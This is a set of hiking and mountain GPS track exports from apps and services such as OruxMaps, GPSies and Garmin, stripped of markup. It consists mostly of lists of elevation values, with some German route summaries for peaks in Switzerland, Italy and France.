+2300.09 + + + +2317.88 + + + +2329.89 + + + +2350.56 + + + +2492.84 + + + +2517.83 + + + +2550.51 + + + +2602.91 + + + +2634.15 + + + +2679.33 + + + +2709.61 + + + +2717.3 + + + +2689.91 + + + +2710.57 + + + +2746.14 + + + +2788.44 + + + +2824.01 + + + +2859.58 + + + +2895.63 + + + +2925.43 + + + +2987.43 + + + +3047.52 + + + +3085.97 + + + +3047.04 + + + +3007.14 + + + +2986.47 + + + +2957.63 + + + +2908.61 + + + +2870.63 + + + +2841.79 + + + +2758.64 + + + +2735.57 + + + +2714.42 + + + +2700.96 + + + +2668.28 + + + +2595.7 + + + +2537.06 + + + +2418.81 + + + +2356.81 + + + +2339.51 + + + +2278.46 + + + +2265.96 + + + +2192.42 + + + +2165.03 + + + +2125.61 + + + +2110.23 + + + +2081.87 + + + +2069.38 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Bäckeralm + +Joachim Lucht - Community + + + + + +Bäckeralm + + + +797.2 + + +792.7 + + +784.6 + + +777.0 + + +794.7 + + +809.4 + + +814.3 + + +834.1 + + +856.5 + + +870.5 + + +883.5 + + +913.0 + + +952.5 + + +968.1 + + +973.5 + + +998.3 + + +1003.1 + + +1019.0 + + +1025.3 + + +1039.8 + + +1060.2 + + +1068.8 + + +1077.9 + + +1082.2 + + +1100.1 + + +1105.2 + + +1102.9 + + +1087.4 + + +1074.7 + + +1062.8 + + +1074.7 + + +1087.4 + + +1071.7 + + +1062.7 + + +1034.0 + + +1020.9 + + +1018.6 + + +1020.2 + + +1011.9 + + +1001.7 + + +966.2 + + +956.7 + + +957.2 + + +951.7 + + +957.6 + + +927.8 + + +933.4 + + +931.2 + + +924.0 + + +896.2 + + +889.2 + + +881.6 + + +876.5 + + +847.3 + + +826.8 + + +819.7 + + +819.0 + + +810.5 + + +800.8 + + +805.5 + + +805.5 + + +800.7 + + +794.7 + + +777.0 + + +775.3 + + +784.6 + + +792.7 + + +797.2 +" +" + + +2016-10-06 11:28 + + + + + +OruxMaps + + + +2016-10-06 11:28 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 2016-10-06 11:28</h2><br /><p>Startzeit: 10/06/2016 11:28</p><p>Zielzeit: 10/06/2016 12:52</p><p>Strecke: 3,7km (01:23)</p><p>Bewegungszeit: 00:53</p><p>Ø-Geschwindigkeit: 2,7km/h</p><p>Netto-Geschwindigkeit: 4,1km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 2199m</p><p>Maximale Höhe: 2847m</p><p>Steig-Geschw.: 522,1m/h</p><p>Sink-Geschw.: -295,5m/h</p><p>Aufstieg: 657m</p><p>Abstieg: -18m</p><p>Steigzeit: 01:15</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2199.44 + + + +2208.45 + + + +2208.56 + + + +2227.69 + + + +2231.76 + + + +2246.64 + + + +2251.84 + + + +2273.23 + + + +2269.79 + + + +2293.91 + + + +2323.65 + + + +2322.04 + + + +2342.91 + + + +2357.47 + + + +2351.27 + + + +2357.34 + + + +2365.03 + + + +2380.42 + + + +2389.95 + + + +2400.36 + + + +2404.81 + + + +2416.79 + + + +2442.94 + + + +2482.28 + + + +2489.94 + + + +2496.11 + + + +2507.08 + + + +2523.35 + + + +2524.78 + + + +2525.81 + + + +2533.32 + + + +2565.94 + + + +2609.29 + + + +2642.94 + + + +2649.94 + + + +2671.4 + + + +2703.78 + + + +2730.48 + + + +2776.85 + + + +2826.26 + + + +2847.53 + +" +" + + +Speicher - P. 1001 - Teufen + +fuemm63 + +fuemm63 on GPSies.com +GPSiesUserOnWeb + + +Speicher - P. 1001 - Teufen on GPSies.com +trackOnWeb + + +one-way trip +177.0 +6216.320946798513 +835.0 +1066.0 +296.0 + +Speicher - P. 1001 - Teufen on GPSies.com + +trackOnWeb + + +958.0 + + + +959.0 + + + +960.0 + + + +974.0 + + + +1011.0 + + + +1012.0 + + + +1022.0 + + + +1041.0 + + + +1051.0 + + + +1050.0 + + + +1055.0 + + + +1065.0 + + + +1061.0 + + + +1052.0 + + + +1034.0 + + + +1001.0 + + + +1004.0 + + + +1029.0 + + + +1029.0 + + + +1013.0 + + + +996.0 + + + +981.0 + + + +977.0 + + + +978.0 + + + +984.0 + + + +996.0 + + + +993.0 + + + +998.0 + + + +991.0 + + + +992.0 + + + +993.0 + + + +995.0 + + + +998.0 + + + +1000.0 + + + +1000.0 + + + +999.0 + + + +993.0 + + + +984.0 + + + +972.0 + + + +959.0 + + + +961.0 + + + +961.0 + + + +960.0 + + + +956.0 + + + +947.0 + + + +931.0 + + + +921.0 + + + +901.0 + + + +889.0 + + + +878.0 + + + +858.0 + + + +856.0 + + + +852.0 + + + +853.0 + + + +851.0 + + + +844.0 + + + +835.0 + + + +841.0 + + + +840.0 + + + +839.0 + +" +" + + + + + + +Garmin International + + + +susten + + + + + + +1524.04 + + + +1524.38 + + + +1526.03 + + + +1527.04 + + + +1546.25 + + + +1557.01 + + + +1570.52 + + + +1577.94 + + + +1604.29 + + + +1622.4 + + + +1626.01 + + + +1648.99 + + + +1657.64 + + + +1700.26 + + + +1713.34 + + + +1734.89 + + + +1751.44 + + + +1801.61 + + + +1833.44 + + + +1841.77 + + + +1845.28 + + + +1844.96 + + + +1841.66 + + + +1854.24 + + + +1860.35 + + + +1867.25 + + + +1878.42 + + + +1895.31 + + + +1897.01 + + + +1944.24 + + + +2004.14 + + + +2024.3 + + + +2038.01 + + + +2054.5 + + + +2068.59 + + + +2080.05 + + + +2099.04 + + + +2101.16 + + + +2096.86 + + + +2094.49 + + + +2097.19 + + + +2098.01 + + + +2099.04 + + + +2084.1 + + + +2053.65 + + + +2037.7 + + + +1986.66 + + + +1940.59 + + + +1908.21 + + + +1890.38 + + + +1885.97 + + + +1874.7 + + + +1872.24 + + + +1860.11 + + + +1855.94 + + + +1853.89 + + + +1838.29 + + + +1819.87 + + + +1782.79 + + + +1777.77 + + + +1772.67 + + + +1764.93 + + + +1741.59 + + + +1721.88 + + + +1707.18 + + + +1668.64 + + + +1628.5 + + + +1619.65 + + + +1606.19 + + + +1590.94 + + + +1584.22 + + + +1568.51 + + + +1547.84 + +" +" + + +Monte Brè - Pregassona + +fuemm63 + +fuemm63 on GPSies.com +GPSiesUserOnWeb + + +Monte Brè - Pregassona on GPSies.com +trackOnWeb + + +one-way trip +20.0 +5416.351928066745 +367.0 +913.0 +550.0 + +Monte Brè - Pregassona on GPSies.com + +trackOnWeb + + +897.0 + + + +895.0 + + + +910.0 + + + +876.0 + + + +855.0 + + + +824.0 + + + +788.0 + + + +785.0 + + + +771.0 + + + +779.0 + + + +786.0 + + + +793.0 + + + +795.0 + + + +798.0 + + + +791.0 + + + +789.0 + + + +789.0 + + + +797.0 + + + +793.0 + + + +779.0 + + + +790.0 + + + +791.0 + + + +763.0 + + + +757.0 + + + +742.0 + + + +744.0 + + + +723.0 + + + +729.0 + + + +721.0 + + + +710.0 + + + +697.0 + + + +691.0 + + + +674.0 + + + +680.0 + + + +673.0 + + + +667.0 + + + +655.0 + + + +642.0 + + + +645.0 + + + +635.0 + + + +617.0 + + + +608.0 + + + +574.0 + + + +569.0 + + + +562.0 + + + +550.0 + + + +543.0 + + + +521.0 + + + +519.0 + + + +523.0 + + + +506.0 + + + +501.0 + + + +502.0 + + + +497.0 + + + +491.0 + + + +488.0 + + + +487.0 + + + +476.0 + + + +460.0 + + + +451.0 + + + +450.0 + + + +470.0 + + + +435.0 + + + +435.0 + + + +412.0 + + + +407.0 + + + +386.0 + + + +382.0 + + + +376.0 + + + +367.0 + +" +" + + + + + + +Core Coders Ltd + + + +Day 43 2016/2017 + + + +1943.0 + + + +1918.0 + + + +1920.0 + + + +1920.0 + + + +1925.0 + + + +1926.0 + + + +1929.0 + + + +1938.0 + + + +1944.0 + + + +1945.0 + + + +1956.0 + + + +1973.0 + + + +1995.0 + + + +2007.0 + + + +2026.0 + + + +2025.0 + + + +2042.0 + + + +2049.0 + + + +2085.0 + + + +2098.0 + + + +2125.0 + + + +2176.0 + + + +2195.0 + + + +2249.0 + + + +2253.0 + + + +2282.0 + + + +2313.0 + + + +2318.0 + + + +2423.0 + + + +2451.0 + + + +2479.0 + + + +2541.0 + + + +2601.0 + + + +2647.0 + + + +2744.0 + + + +2789.0 + + + +2725.0 + + + +2634.0 + + + +2575.0 + + + +2532.0 + + + +2511.0 + + + +2493.0 + + + +2401.0 + + + +2357.0 + + + +2331.0 + + + +2294.0 + + + +2273.0 + + + +2253.0 + + + +2202.0 + + + +2166.0 + + + +2116.0 + + + +2106.0 + + + +2106.0 + + + +2098.0 + + + +2094.0 + + + +2091.0 + + + +2041.0 + + + +2029.0 + + + +2020.0 + + + +2008.0 + + + +2002.0 + + + +1986.0 + + + +1979.0 + + + +1942.0 + + + +1942.0 + + + +1943.0 + + + +1936.0 + + + +1933.0 + + + +1927.0 + + + +1921.0 + + + +1919.0 + + + +1908.0 + + + +1911.0 + +" +" + + + + + + +Garmin International + + +21-JUL-15 14:30:45 + + + + + +1761.75 + + + +1808.38 + + + +1818.47 + + + +1816.55 + + + +1817.99 + + + +1817.51 + + + +1829.53 + + + +1836.26 + + + +1826.16 + + + +1818.47 + + + +1815.59 + + + +1832.41 + + + +1835.29 + + + +1808.86 + + + +1811.26 + + + +1798.28 + + + +1788.19 + + + +1785.79 + + + +1776.65 + + + +1777.61 + + + +1792.52 + + + +1789.15 + + + +1781.46 + + + +1768.48 + + + +1764.16 + + + +1782.42 + + + +1793.96 + + + +1819.91 + + + +1855.0 + + + +1857.4 + + + +1833.85 + + + +1874.23 + + + +1889.61 + + + +1904.03 + + + +1912.68 + + + +1883.84 + + + +1847.79 + + + +1824.24 + + + +1814.15 + + + +1797.32 + + + +1782.42 + + + +1770.41 + + + +1746.85 + + + +1736.28 + + + +1717.53 + + + +1722.82 + + + +1727.15 + +" +" + + + + + + +GPS dump for www.flightlog.org + + + +Track 001 + + + +2104.9 + + + +2119.8 + + + +2118.8 + + + +2131.3 + + + +2146.7 + + + +2173.2 + + + +2189.0 + + + +2194.3 + + + +2227.9 + + + +2243.3 + + + +2240.9 + + + +2290.0 + + + +2297.6 + + + +2302.4 + + + +2309.2 + + + +2321.2 + + + +2318.8 + + + +2332.7 + + + +2340.4 + + + +2340.9 + + + +2337.5 + + + +2334.2 + + + +2341.9 + + + +2340.9 + + + +2347.2 + + + +2360.1 + + + +2374.1 + + + +2375.0 + + + +2375.0 + + + +2390.9 + + + +2410.1 + + + +2399.1 + + + +2389.0 + + + +2372.1 + + + +2394.3 + + + +2430.3 + + + +2437.5 + + + +2438.0 + + + +2434.6 + + + +2412.0 + + + +2381.8 + + + +2385.1 + + + +2389.9 + + + +2414.4 + + + +2406.3 + + + +2394.3 + + + +2396.7 + + + +2417.3 + + + +2424.5 + + + +2479.8 + + + +2492.3 + + + +2468.3 + + + +2462.5 + + + +2450.5 + + + +2453.9 + + + +2468.3 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +82.0 + + + +82.0 + + + +85.0 + + + +53.0 + + + +59.0 + + + +55.0 + + + +66.0 + + + +71.0 + + + +75.0 + + + +76.0 + + + +80.0 + + + +78.0 + + + +73.0 + + + +66.0 + + + +65.0 + + + +57.0 + + + +42.0 + + + +30.0 + + + +64.0 + + + +53.0 + + + +32.0 + + + +32.0 + + + +42.0 + + + +45.0 + + + +29.0 + + + +48.0 + + + +57.0 + + + +64.0 + + + +67.0 + + + +58.0 + + + +82.0 + + + +83.0 + + + +79.0 + + + +83.0 + + + +78.0 + + + +89.0 + + + +89.0 + + + +92.0 + + + +92.0 + + + +92.0 + + + +91.0 + + + +92.0 + + + +92.0 + + + +91.0 + + + +107.0 + + + +107.0 + + + +107.0 + + + +108.0 + + + +95.0 + + + +87.0 + + + +86.0 + + + +85.0 + + + +82.0 + + + +82.0 + +" +" + + +Mont Charvin 2 + + + + + +OruxMaps + + + +Mont Charvin 2 +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Mont Charvin 2</h2><br /><p>Startzeit: 06/23/2016 10:58</p><p>Zielzeit: 06/23/2016 14:05</p><p>Strecke: 4,2km (03:06)</p><p>Bewegungszeit: 01:43</p><p>Ø-Geschwindigkeit: 1,3km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 5,7km/h</p><p>Minimale Höhe: 1382m</p><p>Maximale Höhe: 2404m</p><p>Steig-Geschw.: 364,2m/h</p><p>Sink-Geschw.: -177,6m/h</p><p>Aufstieg: 1039m</p><p>Abstieg: -33m</p><p>Steigzeit: 02:51</p><p>Sinkzeit: 00:11</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1383.54 + + + +1401.87 + + + +1406.5 + + + +1405.53 + + + +1425.53 + + + +1441.36 + + + +1456.66 + + + +1479.87 + + + +1495.03 + + + +1497.53 + + + +1503.57 + + + +1497.83 + + + +1502.52 + + + +1513.41 + + + +1519.5 + + + +1546.41 + + + +1573.01 + + + +1571.52 + + + +1612.58 + + + +1635.0 + + + +1634.22 + + + +1624.97 + + + +1647.97 + + + +1648.58 + + + +1660.06 + + + +1682.61 + + + +1701.54 + + + +1733.67 + + + +1720.74 + + + +1759.02 + + + +1800.17 + + + +1813.05 + + + +1842.01 + + + +1894.61 + + + +1901.26 + + + +1943.68 + + + +1958.67 + + + +1967.3 + + + +2037.05 + + + +2069.94 + + + +2090.17 + + + +2121.58 + + + +2124.01 + + + +2143.17 + + + +2160.55 + + + +2161.67 + + + +2206.17 + + + +2209.8 + + + +2229.05 + + + +2247.71 + + + +2260.58 + + + +2276.11 + + + +2294.3 + + + +2301.23 + + + +2314.05 + + + +2325.21 + + + +2356.19 + + + +2373.55 + + + +2404.53 + +" +" + + + + + + +Garmin International + + +STRADIGUARD16:10:54 + + + + + + +794.67 + + + +821.1 + + + +851.38 + + + +862.92 + + + +870.61 + + + +890.8 + + + +938.38 + + + +947.52 + + + +979.24 + + + +1000.39 + + + +1021.06 + + + +1026.34 + + + +1040.28 + + + +1036.44 + + + +1037.88 + + + +1021.06 + + + +1021.06 + + + +1020.58 + + + +1020.1 + + + +1009.52 + + + +1014.81 + + + +1000.87 + + + +977.8 + + + +961.46 + + + +971.55 + + + +1002.79 + + + +1016.73 + + + +1018.65 + + + +1025.86 + + + +1039.8 + + + +1051.34 + + + +1064.8 + + + +1067.2 + + + +1064.32 + + + +1056.15 + + + +1067.2 + + + +1083.54 + + + +1105.17 + + + +1129.69 + + + +1139.78 + + + +1173.43 + + + +1184.48 + + + +1196.02 + + + +1196.02 + + + +1216.69 + + + +1221.49 + + + +1222.93 + + + +1217.17 + + + +1214.28 + + + +1210.44 + + + +1228.22 + + + +1243.6 + + + +1275.81 + +" +" + + + + + + + +Säntis + + + +1359.92 + + +1359.44 + + +1373.86 + + +1398.86 + + +1400.78 + + +1401.74 + + +1405.58 + + +1439.71 + + +1463.26 + + +1489.22 + + +1493.06 + + +1513.73 + + +1535.84 + + +1542.57 + + +1570.45 + + +1579.58 + + +1583.91 + + +1594.48 + + +1619.48 + + +1627.17 + + +1643.03 + + +1654.57 + + +1669.95 + + +1677.16 + + +1701.19 + + +1730.03 + + +1744.45 + + +1749.26 + + +1763.2 + + +1783.38 + + +1817.99 + + +1824.24 + + +1838.18 + + +1848.75 + + +1864.61 + + +1883.36 + + +1895.86 + + +1901.63 + + +1921.33 + + +1925.18 + + +1966.03 + + +1996.8 + + +2007.37 + + +2026.6 + + +2040.54 + + +2057.36 + + +2080.43 + + +2083.79 + + +2090.04 + + +2107.83 + + +2122.25 + + +2132.82 + + +2140.99 + + +2143.88 + + +2145.32 + + +2147.72 + + +2144.36 + + +2182.33 + + +2250.58 + + +2262.6 + + +2275.1 + + +2280.87 + + +2304.9 + + +2332.78 + + +2345.27 + + +2356.81 + + +2378.92 + + +2395.26 + + +2403.43 + + +2394.78 + + +2448.13 + + +2460.15 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin Connect + + +Niederbauen Chulm ( 1923m ) & Gütsch ( 1884m ) 24.10.2015 + + + +1544.4000244140625 + + + +1546.199951171875 + + + +1556.800048828125 + + + +1566.4000244140625 + + + +1564.800048828125 + + + +1571.199951171875 + + + +1571.0 + + + +1576.4000244140625 + + + +1578.800048828125 + + + +1602.5999755859375 + + + +1605.4000244140625 + + + +1614.4000244140625 + + + +1624.5999755859375 + + + +1657.199951171875 + + + +1662.0 + + + +1693.0 + + + +1698.0 + + + +1716.5999755859375 + + + +1715.0 + + + +1738.5999755859375 + + + +1734.4000244140625 + + + +1772.800048828125 + + + +1823.199951171875 + + + +1837.5999755859375 + + + +1859.199951171875 + + + +1872.5999755859375 + + + +1886.800048828125 + + + +1888.0 + + + +1889.4000244140625 + + + +1881.4000244140625 + + + +1885.800048828125 + + + +1869.199951171875 + + + +1859.4000244140625 + + + +1854.5999755859375 + + + +1855.5999755859375 + + + +1826.800048828125 + + + +1810.4000244140625 + + + +1726.800048828125 + + + +1705.199951171875 + + + +1654.5999755859375 + + + +1613.0 + + + +1609.199951171875 + + + +1608.800048828125 + + + +1596.0 + + + +1597.800048828125 + + + +1588.4000244140625 + + + +1583.5999755859375 + + + +1579.0 + + + +1575.800048828125 + + + +1570.199951171875 + + + +1565.5999755859375 + + + +1560.0 + + + +1547.0 + +" +" + + + + + + +Garmin International + + +2017-07-27 14:33:32 + + + + + +2139.07 + + + +2192.42 + + + +2307.78 + + + +2365.46 + + + +2371.23 + + + +2382.28 + + + +2389.49 + + + +2402.47 + + + +2435.16 + + + +2475.05 + + + +2514.95 + + + +2537.54 + + + +2582.24 + + + +2590.41 + + + +2614.92 + + + +2672.6 + + + +2691.35 + + + +2712.98 + + + +2721.15 + + + +2728.36 + + + +2753.35 + + + +2774.02 + + + +2796.61 + + + +2877.84 + + + +2928.31 + + + +2961.0 + + + +2990.32 + + + +3016.27 + + + +3079.72 + + + +3078.76 + + + +3069.15 + + + +3092.7 + + + +3094.14 + + + +3103.75 + + + +3105.2 + + + +3129.23 + + + +3151.34 + + + +3155.66 + + + +3113.85 + + + +3105.68 + + + +3101.83 + + + +3102.79 + + + +3101.35 + + + +3071.55 + + + +3046.07 + + + +2973.5 + + + +2940.33 + + + +2906.68 + + + +2863.42 + + + +2817.76 + + + +2795.65 + + + +2771.14 + + + +2751.91 + + + +2732.68 + + + +2732.68 + + + +2671.64 + + + +2636.07 + + + +2578.39 + + + +2545.71 + + + +2441.89 + + + +2404.39 + + + +2394.78 + + + +2368.35 + + + +2328.93 + + + +2229.43 + + + +2199.15 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Tourenplanung am 7. November 2015 + +null - TemporaryUserGroup + + + + + +Tourenplanung am 7. November 2015 + + + +565.8 + + +563.6 + + +564.9 + + +596.5 + + +595.0 + + +596.7 + + +591.5 + + + +591.5 + + +596.7 + + +595.0 + + +596.5 + + +564.9 + + +563.6 + + +565.8 + + + +565.8 + + +582.5 + + +581.4 + + +577.3 + + +559.9 + + +553.3 + + +564.2 + + +576.2 + + +592.2 + + +593.6 + + +595.3 + + +598.6 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-11-08 16:22:29 + + + + + + +1130.13 + + + +1158.81 + + + +1209.39 + + + +1229.27 + + + +1247.99 + + + +1290.86 + + + +1317.83 + + + +1336.91 + + + +1382.83 + + + +1396.56 + + + +1426.67 + + + +1444.71 + + + +1458.29 + + + +1501.9 + + + +1630.42 + + + +1728.92 + + + +1741.08 + + + +1747.88 + + + +1795.65 + + + +1827.55 + + + +1847.57 + + + +1939.21 + + + +1947.5 + + + +1967.22 + + + +2042.9 + + + +2060.17 + + + +2055.46 + + + +2059.19 + + + +2086.87 + + + +2110.96 + + + +2105.44 + + + +2126.47 + + + +2096.31 + + + +2069.36 + + + +2048.52 + + + +2007.32 + + + +1995.38 + + + +2026.89 + + + +2051.27 + + + +2066.66 + + + +2048.54 + + + +2030.58 + + + +2013.04 + + + +1972.28 + + + +1953.05 + + + +1939.6 + + + +1909.98 + + + +1900.12 + + + +1870.42 + + + +1870.74 + + + +1858.99 + + + +1826.86 + + + +1817.53 + + + +1803.6 + + + +1766.2 + + + +1743.13 + + + +1711.51 + + + +1680.49 + + + +1666.86 + + + +1659.83 + + + +1612.7 + + + +1526.12 + + + +1512.99 + + + +1429.36 + + + +1413.96 + + + +1412.02 + + + +1408.55 + + + +1331.94 + + + +1268.4 + + + +1223.86 + + + +1159.47 + + + +1143.99 + +" +" + + +Zinseler + + + + + +OruxMaps + + + +Zinseler +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Zinseler</h2><br /><p>Startzeit: 05/18/2015 17:37</p><p>Zielzeit: 05/18/2015 19:52</p><p>Strecke: 5,2km (02:15)</p><p>Bewegungszeit: 01:36</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 34,2km/h</p><p>Minimale Höhe: 2145m</p><p>Maximale Höhe: 2421m</p><p>Steig-Geschw.: 412,7m/h</p><p>Sink-Geschw.: -489,9m/h</p><p>Aufstieg: 410m</p><p>Abstieg: -425m</p><p>Steigzeit: 00:59</p><p>Sinkzeit: 00:52</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2162.4 + + + +2165.36 + + + +2168.21 + + + +2166.0 + + + +2168.25 + + + +2166.77 + + + +2170.12 + + + +2157.65 + + + +2169.38 + + + +2177.0 + + + +2178.96 + + + +2179.67 + + + +2194.34 + + + +2204.4 + + + +2211.74 + + + +2248.24 + + + +2304.46 + + + +2314.18 + + + +2322.77 + + + +2345.25 + + + +2353.71 + + + +2338.08 + + + +2316.0 + + + +2323.62 + + + +2326.98 + + + +2325.77 + + + +2325.78 + + + +2303.62 + + + +2305.74 + + + +2305.62 + + + +2301.33 + + + +2336.99 + + + +2344.74 + + + +2373.87 + + + +2390.12 + + + +2418.59 + + + +2401.6 + + + +2386.35 + + + +2348.41 + + + +2346.28 + + + +2329.35 + + + +2313.87 + + + +2316.4 + + + +2332.13 + + + +2338.66 + + + +2342.31 + + + +2348.85 + + + +2358.59 + + + +2362.83 + + + +2379.16 + + + +2365.09 + + + +2347.12 + + + +2315.25 + + + +2276.41 + + + +2263.84 + + + +2259.37 + + + +2207.25 + + + +2190.15 + + + +2175.25 + + + +2162.37 + + + +2171.23 + + + +2172.25 + + + +2159.41 + + + +2159.74 + + + +2160.25 + + + +2151.25 + + + +2158.0 + +" +" + + + + + + + + + +Fern Canyon + + + +17.0 + + + + + +0.000000 + +24.0 + + + + + +7.277794 + +22.0 + + + + + +4.465218 + +37.0 + + + + + +12.848969 + +28.0 + + + + + +2.243195 + +42.0 + + + + + +1.384399 + +47.0 + + + + + +5.951782 + +52.0 + + + + + +1.909424 + +57.0 + + + + + +2.090515 + +61.0 + + + + + +20.521545 + +64.0 + + + + + +2.358948 + +64.0 + + + + + +4.100342 + +64.0 + + + + + +5.075623 + +66.0 + + + + + +9.098938 + +67.0 + + + + + +0.737549 + +62.0 + + + + + +13.992737 + +92.0 + + + + + +6.111145 + +91.0 + + + + + +18.486450 + +76.0 + + + + + +4.088623 + +79.0 + + + + + +12.427368 + +73.0 + + + + + +2.309326 + +79.0 + + + + + +11.173096 + +81.0 + + + + + +162.402466 + +77.0 + + + + + +15.113525 + +82.0 + + + + + +3.047241 + +80.0 + + + + + +3.317627 + +88.0 + + + + + +1.424072 + +76.0 + + + + + +2.958740 + +86.0 + + + + + +28.678711 + +96.0 + + + + + +0.736938 + +90.0 + + + + + +18.315918 + +78.0 + + + + + +11.082153 + +62.0 + + + + + +16.127441 + +35.0 + + + + + +5.073730 + +30.0 + + + + + +4.387939 + +23.0 + + + + + +1.468994 + +30.0 + + + + + +1.957275 + +23.0 + + + + + +7.217773 + +17.0 + + + + + +6.356689" +" + + + + + + +Garmin International + + + +Track + + + + + + +774.3242188 + + +778.1132813 + + +777.6914063 + + +771.5898438 + + +767.484375 + + +748.78125 + + +743.7617188 + + +745.9257813 + + +743.859375 + + +741.8320313 + + +737.140625 + + +734.2773438 + + +733.609375 + + +733.6328125 + + +731.28125 + + +729.2773438 + + +728.640625 + + +728.5273438 + + +729.609375 + + +730.484375 + + +729.6601563 + + +737.1289063 + + +737.859375 + + +751.4882813 + + +752.3671875 + + +757.7070313 + + +772.7070313 + + +781.5859375 + + +786.3984375 + + +784.8671875 + + +788.75 + + +790.8828125 + + +789.015625 + + +780.03125 + + +765.8242188 + + +760.2070313 + + +763.0664063 + + +779.6757813 + + +783.78125 + + +793.53125 + + +806.5546875 + + +815.4492188 + + +821.1054688 + + +823.6835938 + + +825.3945313 + + +810.75 + + +804.9765625 + + +804.9726563 + + +804.9726563 + + +804.8789063 + + +804.7578125 + + +808.34375 + + +803.5976563 + + +803.8789063 + + +805.9726563 + + +804.1132813 + + +803.1054688 + + +802.546875 + + +800.5820313 + + +795.2304688 + + +785.9453125 + + +781.4414063 + + +777.9570313 + + +774.9335938 + + +775.8828125 + + +777.3320313 + + +778.9296875 + + +779.7890625 + + +778.2460938 + + +777.7851563 + + +778.1054688 + + +774.4921875 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +ape@map my Phone my Guide + + + + + +2017-09-08 16_11_09 + + + +1070.0 + + + +1070.0 + + + +1089.0 + + + +1061.0 + + + +1072.0 + + + +1121.0 + + + +1074.0 + + + +1175.0 + + + +1194.0 + + + +1165.0 + + + +1192.0 + + + +1249.0 + + + +1255.0 + + + +1296.0 + + + +1292.0 + + + +1301.0 + + + +1324.0 + + + +1358.0 + + + +1374.0 + + + +1378.0 + + + +1414.0 + + + +1438.0 + + + +1453.0 + + + +1478.0 + + + +1494.0 + + + +1488.0 + + + +1513.0 + + + +1516.0 + + + +1535.0 + + + +1530.0 + + + +1542.0 + + + +1544.0 + + + +1548.0 + + + +1553.0 + + + +1555.0 + + + +1556.0 + + + +1540.0 + + + +1528.0 + + + +1547.0 + + + +1553.0 + + + +1551.0 + + + +1554.0 + + + +1551.0 + + + +1566.0 + + + +1560.0 + + + +1552.0 + + + +1575.0 + + + +1578.0 + + + +1601.0 + + + +1602.0 + + + +1610.0 + + + +1628.0 + + + +1651.0 + + + +1662.0 + + + +1699.0 + + + +1713.0 + + + +1723.0 + + + +1795.0 + + + +1807.0 + + + +1823.0 + + + +1856.0 + + + +1857.0 + + + +1876.0 + + + +1883.0 + + + +1881.0 + + + +1930.0 + + + +2014.0 + + + +2121.0 + +" +" + + +Rocciamelone + + + + + +OruxMaps + + + +Rocciamelone +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rocciamelone</h2><br /><p>Startzeit: 08/25/2015 06:58</p><p>Zielzeit: 08/25/2015 10:15</p><p>Strecke: 4,5km (03:16)</p><p>Bewegungszeit: 01:55</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 7,3km/h</p><p>Minimale Höhe: 2137m</p><p>Maximale Höhe: 3527m</p><p>Steig-Geschw.: 503,1m/h</p><p>Sink-Geschw.: -358,4m/h</p><p>Aufstieg: 1335m</p><p>Abstieg: -29m</p><p>Steigzeit: 02:39</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2171.28 + + + +2169.08 + + + +2144.67 + + + +2151.22 + + + +2165.21 + + + +2175.3 + + + +2180.0 + + + +2201.84 + + + +2227.03 + + + +2253.26 + + + +2276.77 + + + +2283.28 + + + +2303.89 + + + +2318.43 + + + +2343.67 + + + +2354.97 + + + +2371.71 + + + +2447.77 + + + +2470.3 + + + +2482.66 + + + +2517.49 + + + +2565.38 + + + +2572.77 + + + +2606.25 + + + +2622.89 + + + +2633.15 + + + +2648.28 + + + +2683.29 + + + +2702.65 + + + +2732.02 + + + +2749.27 + + + +2763.27 + + + +2771.27 + + + +2800.89 + + + +2804.8 + + + +2813.24 + + + +2836.65 + + + +2906.86 + + + +2948.18 + + + +3009.3 + + + +3024.36 + + + +3070.65 + + + +3078.4 + + + +3113.76 + + + +3150.27 + + + +3153.02 + + + +3183.4 + + + +3198.24 + + + +3253.9 + + + +3259.61 + + + +3273.77 + + + +3355.3 + + + +3419.64 + + + +3432.76 + + + +3493.77 + + + +3515.2 + + + +3527.27 + +" +" + + + + + + +Garmin International + + +2015-04-22 13:09:00 + + + + + + +458.84 + + + +459.87 + + + +471.72 + + + +507.68 + + + +529.14 + + + +537.96 + + + +584.51 + + + +598.49 + + + +607.56 + + + +614.13 + + + +626.27 + + + +633.0 + + + +675.9 + + + +698.91 + + + +702.18 + + + +707.04 + + + +723.63 + + + +738.67 + + + +751.58 + + + +759.43 + + + +790.74 + + + +803.94 + + + +827.01 + + + +838.12 + + + +843.24 + + + +857.43 + + + +864.38 + + + +876.81 + + + +885.33 + + + +891.36 + + + +894.3 + + + +921.38 + + + +945.16 + + + +955.02 + + + 